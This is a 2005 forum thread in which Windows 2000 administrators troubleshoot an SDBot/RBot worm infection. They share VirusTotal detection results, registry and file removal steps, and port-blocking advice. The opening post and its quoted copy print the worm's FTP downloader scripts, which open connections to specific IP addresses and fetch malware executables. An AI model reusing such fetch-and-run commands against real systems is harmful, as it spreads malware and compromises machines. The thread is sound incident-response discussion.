New virus/worm? mousebm.exe, eraseme_XXXXX.exe and svnlitup32.exe

Discussion in 'Virus Information' started by Thomas Cameron, Aug 16, 2005.

  1. All -

    I have a Windows 2000 server which somehow got connected to the 'Net
    without AV software on it. Now there is a new "service" called "Mouse
    Button Monitor" which is controlled by %windir%\system32\mousebm.exe.
    I also found the following files in %windir%\system32 which appear to
    be new:

    08/15/2005 09:00p 8,201 .exe
    08/15/2005 12:42p 1,518 eq
    08/15/2005 11:28a 0 eraseme_61087.exe
    08/15/2005 11:28a 71 i
    08/15/2005 08:39a 8,201 mousebm.exe
    08/14/2005 04:00p 0 svnlitup32.exe

    The file called ".exe" has the system and hidden attributes set.

    I deleted the files from system32 but they re-appear after a reboot. I
    try to stop the "Mouse Button Monitor" using "net stop mousebm /y" and
    I get:

    C:\DOCUME~1\ADMINI~1\Desktop>net stop mousebm /y
    The requested pause or stop is not valid for this service.

    More help is available by typing NET HELPMSG 2191.

    The stop and pause buttons are greyed out for the "Mouse Button
    Monitor" service.

    The file "i" contains entries like this:

    open 24.173.15.63 16670
    user 1 1
    get eraseme_61087.exe
    quit

    The file "eq" contains pages and pages of entries which look like this:

    open 24.173.252.20 10082
    user 23107 28392
    get svnlitup32.exe
    quit
    open 24.173.144.52 1317
    user 17789 4406
    get svnlitup32.exe
    quit
    open 24.173.2.21 30380
    user 31975 3371
    get svnlitup32.exe
    quit
    open 24.173.2.116 14953
    user 16493 3501
    get svnlitup32.exe
    quit

    I grabbed the latest McAfee SuperDAT and extracted it. I ran scan.exe
    from the command line like this:

    scan c:\ /all /sub /clean /log c:\vscan.log

    It reported no viruses.

    Every time I try to install McAfee on the machine, I get an error
    saying "The Windows Installer Service could not be accessed. This can
    occur if you are running Windows in safe mode, or if the Windows
    installer is not correctly installed. Contact your support personnel
    for assistance."

    I think I'm screwed. This sound familiar to anyone?

    Thomas
     
    Thomas Cameron, Aug 16, 2005
    #1
    1. Advertisements

  2. Thomas Cameron

    GeorgeSam1 Guest

    I have the same thing. Been fighting it all day. On w2k only. I have XP
    and w2k3 but no hits there. I renamed the exe in winnt folder and saved
    a different .exe there with the same name. Deleted mousebm entries in
    the registry. Applied all the current maintenance fixes from microsoft.
    Haven't seen it in hours .. So I think I have it removed now.

    I think it's a new worm.. It will traverse your network..
     
    GeorgeSam1, Aug 16, 2005
    #2
    1. Advertisements

  3. Thomas Cameron

    GeorgeSam1 Guest

    I also found a .exe running.. no name just .exe . It is the same exe
    asn mousebm.exe . Did the same thing as with mousebm.exe
     
    GeorgeSam1, Aug 16, 2005
    #3
  4. Thomas Cameron

    GeorgeSam1 Guest

    You can terminate the process from the Taskmanager... but you can use
    .... this process explorer..
    http://www.sysinternals.com/Utilities/ProcessExplorer.html
     
    GeorgeSam1, Aug 16, 2005
    #4
  5. Thomas Cameron

    Unplugged Guest

    Fought it all day, too. Targeted ten suspect PCs using port scans and
    found five with active infections. I was able to disable the first one
    with AutoRuns and then kill it with Process Explorer (both from
    Sysinternals). Sent a sample to SARC who immediately identified it as
    W32.IRCBot. I have a problem with that as it behaves more like a Zotob
    variant, but we'll see what Tuesday brings. I didn't get to the last
    two PCs until late this evening and found them to be infected with a
    more resistant strain. Logged in as local admin, but SAVCE 8.0 with
    the latest rapidrelease updates could only detect but not clean or
    quarantine. Attempts to kill the process using AutoRuns or Process
    Explorer (from Sysinternals.com) were denied. Efforts to boot to safe
    mode or safe mode with command prompt hung every time. I didn't have my
    copy of HJT with me and it was late, so I'll be returning to those PCs.
    Hopefully tomorrow will be a better day!
     
    Unplugged, Aug 16, 2005
    #5
  6. From: "Thomas Cameron" <>

    | All -
    |
    | I have a Windows 2000 server which somehow got connected to the 'Net
    | without AV software on it. Now there is a new "service" called "Mouse
    | Button Monitor" which is controlled by %windir%\system32\mousebm.exe.
    | I also found the following files in %windir%\system32 which appear to
    | be new:
    |
    | 08/15/2005 09:00p 8,201 .exe
    | 08/15/2005 12:42p 1,518 eq
    | 08/15/2005 11:28a 0 eraseme_61087.exe
    | 08/15/2005 11:28a 71 i
    | 08/15/2005 08:39a 8,201 mousebm.exe
    | 08/14/2005 04:00p 0 svnlitup32.exe
    |
    | The file called ".exe" has the system and hidden attributes set.
    |
    | I deleted the files from system32 but they re-appear after a reboot. I
    | try to stop the "Mouse Button Monitor" using "net stop mousebm /y" and
    | I get:
    |
    | C:\DOCUME~1\ADMINI~1\Desktop>net stop mousebm /y
    | The requested pause or stop is not valid for this service.
    |
    | More help is available by typing NET HELPMSG 2191.
    |
    | The stop and pause buttons are greyed out for the "Mouse Button
    | Monitor" service.
    |
    | The file "i" contains entries like this:
    |
    | open 24.173.15.63 16670
    | user 1 1
    | get eraseme_61087.exe
    | quit
    |
    | The file "eq" contains pages and pages of entries which look like this:
    |
    | open 24.173.252.20 10082
    | user 23107 28392
    | get svnlitup32.exe
    | quit
    | open 24.173.144.52 1317
    | user 17789 4406
    | get svnlitup32.exe
    | quit
    | open 24.173.2.21 30380
    | user 31975 3371
    | get svnlitup32.exe
    | quit
    | open 24.173.2.116 14953
    | user 16493 3501
    | get svnlitup32.exe
    | quit
    |
    | I grabbed the latest McAfee SuperDAT and extracted it. I ran scan.exe
    | from the command line like this:
    |
    | scan c:\ /all /sub /clean /log c:\vscan.log
    |
    | It reported no viruses.
    |
    | Every time I try to install McAfee on the machine, I get an error
    | saying "The Windows Installer Service could not be accessed. This can
    | occur if you are running Windows in safe mode, or if the Windows
    | installer is not correctly installed. Contact your support personnel
    | for assistance."
    |
    | I think I'm screwed. This sound familiar to anyone?
    |
    | Thomas

    Please submit a sampleof the EXE file(s) to Virus Total --
    http://www.virustotal.com/flash/index_en.html
    The submission(s) will then be tested against many different AV vendor's scanners.
    That will give you an idea what it is and who recognizes it. In addition, unless told
    otherwise, Virus Total will provide the sample to all paricipating vendors.

    When you get the report, please post back the exact reults.
     
    David H. Lipman, Aug 16, 2005
    #6
  7. Additionally, is anyone else seeing ports 6000-6003 listening on a
    compromised machine?
     
    Thomas Cameron, Aug 16, 2005
    #7
  8. Thomas Cameron

    onebrother Guest

    One option that I tried was to deny permissions to the file so that it
    doesn't run @ all...

    That seems to do the trick but I want to get rid of it...
     
    onebrother, Aug 16, 2005
    #8
  9. From: <>

    | One option that I tried was to deny permissions to the file so that it
    | doesn't run @ all...
    |
    | That seems to do the trick but I want to get rid of it...

    We need to know what it is !

    Please submit a sample ASAP to Virus Total --
    http://www.virustotal.com/flash/index_en.html
    The submission will then be tested against many different AV vendor's scanners.
    That will give you an idea what it is and who recognizes it. In addition, unless told
    otherwise, Virus Total will provide the sample to all participating vendors.

    When you get the report, please post back the exact results.
     
    David H. Lipman, Aug 16, 2005
    #9
  10. Thomas Cameron

    ggillies Guest

    We had the same issue on a W2K server Monday. Here are the Virustotal
    scan reports on 2 of the files (eraseme_43263.exe and i.exe on our
    case) Nothing was found in the others (mousebm.exe and winsvc32.exe)

    Antivirus Version Update Result
    AntiVir 6.31.1.0 08.16.2005 no virus found
    Avast 4.6.695.0 08.16.2005 no virus found
    AVG 718 08.15.2005 no virus found
    Avira 6.31.1.0 08.16.2005 no virus found
    BitDefender 7.0 08.16.2005 Backdoor.SDBot.33E8D99B
    CAT-QuickHeal 7.03 08.16.2005 Backdoor.SdBot.adj
    ClamAV devel-20050725 08.16.2005 no virus found
    DrWeb 4.32b 08.16.2005 no virus found
    eTrust-Iris 7.1.194.0 08.16.2005 no virus found
    eTrust-Vet 11.9.1.0 08.16.2005 no virus found
    Fortinet 2.41.0.0 08.16.2005 PossibleThreat
    F-Prot 3.16c 08.16.2005 no virus found
    Ikarus 0.2.59.0 08.16.2005 no virus found
    Kaspersky 4.0.2.24 08.16.2005 Backdoor.Win32.SdBot.adj
    McAfee 4559 08.16.2005 W32/Sdbot.worm.gen.h
    NOD32v2 1.1195 08.16.2005 a variant of IRC/SdBot
    Norman 5.70.10 08.16.2005 no virus found
    Panda 8.02.00 08.16.2005 no virus found
    Sophos 3.96.0 08.16.2005 W32/Rbot-ALA
    Sybari 7.5.1314 08.16.2005 W32/Sdbot.worm.gen.h
    Symantec 8.0 08.16.2005 W32.Spybot.Worm
    TheHacker 5.8.2.089 08.16.2005 no virus found
    VBA32 3.10.4 08.16.2005 suspected of Embedded.Backdoor.Win32.SdBot.zo



    Antivirus Version Update Result
    AntiVir 6.31.1.0 08.16.2005 no virus found
    Avast 4.6.695.0 08.16.2005 no virus found
    AVG 718 08.15.2005 no virus found
    Avira 6.31.1.0 08.16.2005 no virus found
    BitDefender 7.0 08.16.2005 Backdoor.BotGet.FtpB.Gen
    CAT-QuickHeal 7.03 08.16.2005 no virus found
    ClamAV devel-20050725 08.16.2005 Trojan.Downloader.FTP.Gen-4
    DrWeb 4.32b 08.16.2005 no virus found
    eTrust-Iris 7.1.194.0 08.16.2005 no virus found
    eTrust-Vet 11.9.1.0 08.16.2005 no virus found
    Fortinet 2.41.0.0 08.16.2005 BAT/Dloader.AB-net
    F-Prot 3.16c 08.16.2005 no virus found
    Ikarus 0.2.59.0 08.16.2005 no virus found
    Kaspersky 4.0.2.24 08.16.2005 Trojan-Downloader.BAT.Ftp.ab
    McAfee 4559 08.16.2005 W32/Sdbot.worm!ftp
    NOD32v2 1.1195 08.16.2005 no virus found
    Norman 5.70.10 08.16.2005 Text/BotFTP.gen
    Panda 8.02.00 08.16.2005 W32/Sdbot.ftp
    Sophos 3.96.0 08.16.2005 no virus found
    Sybari 7.5.1314 08.16.2005 Trojan-Downloader.BAT.Ftp.ab
    Symantec 8.0 08.16.2005 no virus found
    TheHacker 5.8.2.089 08.16.2005 Trojan/Downloader-bat
    VBA32 3.10.4 08.16.2005 no virus found

    We stopped it by closing port 445. Also disabled the SNMP service as
    requested by our network admin. Been OK since then, although we have
    been seeing repeated connection attempts in the firewall log to port
    445 from the same IP number found in one of the files we removed.

    George
     
    ggillies, Aug 16, 2005
    #10
  11. Thomas Cameron

    x96bell3 Guest

    I ran into this problem yesterday. Some jerk from France was all ove
    my box... Initially the file causing the problem was smsc.exe and the
    I got infected with mousebm.exe. I have reposrt the variants to Tran
    Micro and Symantec....

    Removal instructions:


    Search your registry and remove all references to Mousbm.exe an
    smsc.exe. I notcied that some of the keys had permissions set on the
    so you may need to reset the permissions using regedt32.

    You can't delete the file and I was unable to stop the process
    however, I was able to rename the files. so I renamed them to bob.bad

    I then wrote a batch file to delete the bob.bad files and the origina
    names of the files.

    I called that batch file from the run reg key and rebooted my system

    After the reboot I installed the latest updates fro
    http://Windowsupdate.microsoft.com

    Note: while the virus was running I was unable to install an
    updates...

    Peace
     
    x96bell3, Aug 16, 2005
    #11
  12. Thomas Cameron

    x96bell3 Guest

    oh yeah, I used Sniffer to view the traffic and TCPview fro
    http://sysinternals.com to do a traffic to process mapping...
     
    x96bell3, Aug 16, 2005
    #12
  13. From: <>

    |
    | We had the same issue on a W2K server Monday. Here are the Virustotal
    | scan reports on 2 of the files (eraseme_43263.exe and i.exe on our
    | case) Nothing was found in the others (mousebm.exe and winsvc32.exe)
    |

    < snip >

    | McAfee 4559 08.16.2005 W32/Sdbot.worm.gen.h
    | Sophos 3.96.0 08.16.2005 W32/Rbot-ALA
    | McAfee 4559 08.16.2005 W32/Sdbot.worm!ftp

    < snip >


    Well there ya' go. a SDBot/RBot variant !
    The McAfee and Sophos modules, from the below utility, should clean this.


    Download MULTI_AV.EXE from the URL --
    http://www.ik-cs.com/programs/virtools/Multi_AV.exe

    It is a self-extracting ZIP file that contains the Kixtart Script Interpreter {
    http://kixtart.org Kixtart is CareWare } three batch files, five Kixtart scripts, one Link
    (.LNK) file, a PDF instruction file and two utilities; UNZIP.EXE and WGET.EXE. It will
    simplify the process of using; Sophos, Trend and McAfee Anti Virus Command Line Scanners to
    remove
    viruses, Trojans and various other malware.

    C:\AV-CLS\StartMenu.BAT -- { or Double-click on 'Start Menu' in C:\AV-CLS}
    This will bring up the initial menu of choices and should be executed in Normal Mode. This
    way all the components can be downloaded from each AV vendor’s web site.
    The choices are; Sophos, Trend, McAfee, Exit the menu and Reboot the PC.

    You can choose to go to each menu item and just download the needed files or you can
    download the files and perform a scan in Normal Mode. Once you have downloaded the files
    needed for each scanner you want to use, you should reboot the PC into Safe Mode [F8 key
    during boot] and re-run the menu again and choose which scanner you want to run in Safe
    Mode. It is suggested to run the scanners in both Safe Mode and Normal Mode.

    When the menu is displayed hitting 'H' or 'h' will bring up a more comprehensive PDF help
    file.

    To use this utility, perform the following...
    Execute; Multi_AV.exe { Note: You must use the default folder C:\AV-CLS }
    Choose; Unzip
    Choose; Close

    Execute; C:\AV-CLS\StartMenu.BAT
    { or Double-click on 'Start Menu' in C:\AV-CLS }

    NOTE: You may have to disable your software FireWall or allow WGET.EXE to go through your
    FireWall to allow it to download the needed AV vendor related files.

    * * * Please report back your results * * *
     
    David H. Lipman, Aug 16, 2005
    #13
    1. Advertisements

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments (here). After that, you can post your question and our members will help you out.